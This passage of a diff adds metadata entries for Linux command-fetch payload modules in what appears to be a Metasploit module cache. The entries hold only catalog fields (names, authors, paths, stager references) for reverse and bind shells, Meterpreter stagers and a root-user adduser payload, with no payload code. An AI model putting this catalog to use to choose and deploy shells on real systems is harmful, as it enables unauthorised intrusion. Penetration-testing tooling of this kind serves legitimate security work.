"path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/http/x86/shell/find_tag": { + "name": "HTTP Fetch, Linux Command Shell, Find Tag Stager", + "fullname": "payload/cmd/linux/http/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/find_tag", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/http/x86/shell/reverse_ipv6_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/shell/reverse_nonx_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/http/x86/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/http/x86/shell/reverse_tcp_uuid": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/http/x86/shell_bind_ipv6_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_bind_tcp_random_port": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_find_port": { + "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/http/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_find_port", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_find_tag": { + "name": "HTTP Fetch, Linux Command Shell, Find Tag Inline", + "fullname": "payload/cmd/linux/http/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_find_tag", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle ", + "joev " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_reverse_tcp_ipv6": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Matteo Malvica " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", + "staged": false + }, + "payload_cmd/linux/https/aarch64/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack " + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/https/aarch64/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/aarch64/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/aarch64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/aarch64/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/https/aarch64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/armbe/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/armbe/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/armbe/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/armbe/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Balazs Bucsay @xoreipeip " + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/armle/adduser": { + "name": "HTTPS Fetch, Linux Add User", + "fullname": "payload/cmd/linux/https/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/adduser", + "staged": false + }, + "payload_cmd/linux/https/armle/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/exec", + "staged": false + }, + "payload_cmd/linux/https/armle/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/https/armle/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/https/armle/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/armle/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/armle/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 